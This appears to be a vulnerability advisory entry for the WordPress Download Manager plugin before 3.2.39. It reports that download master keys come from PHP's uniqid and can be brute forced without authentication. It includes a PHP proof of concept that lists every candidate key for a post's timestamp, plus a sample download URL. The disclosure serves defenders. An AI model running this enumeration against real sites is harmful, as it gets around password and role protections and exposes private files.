Download Manager < 3.2.39 - Unauthenticated brute force of files master key

2022-03-1600:00:00

wpvulndb

131

0.002 Low

EPSS

Percentile

58.9%

JSON

The plugin uses the uniqid php function to generate the master key for a download, allowing an attacker to brute force the key with reasonable resources giving direct download access regardless of role based restrictions or password protections set for the download.

<?php

// The full timestamp from the post containing the download (available to unauthenticated user.)
$wordpress_data = "2022-02-03T18:50:35+00:00";
$requestTimestamp = strtotime($wordpress_data);

function uniqidGen($timestamp) {
    return sprintf("%8x%05x",floor($timestamp),($timestamp-floor($timestamp))*1000000);
}

// Generate all possible master keys for the given timestamp (max 1 million keys)
for ($i = 0; $i <= 999999; $i++) {
    echo uniqidGen($requestTimestamp . "." . $i), PHP_EOL;
}

// The dowload link would be something like this:
// https://example.com/download/test-download/?wpdmdl=5&_wpdmkey=6203ab5c2a704

0.002 Low

EPSS

Percentile

58.9%

JSON

Related for WPEX-ID:7F0742AD-6FD7-4258-9E44-D42E138789BB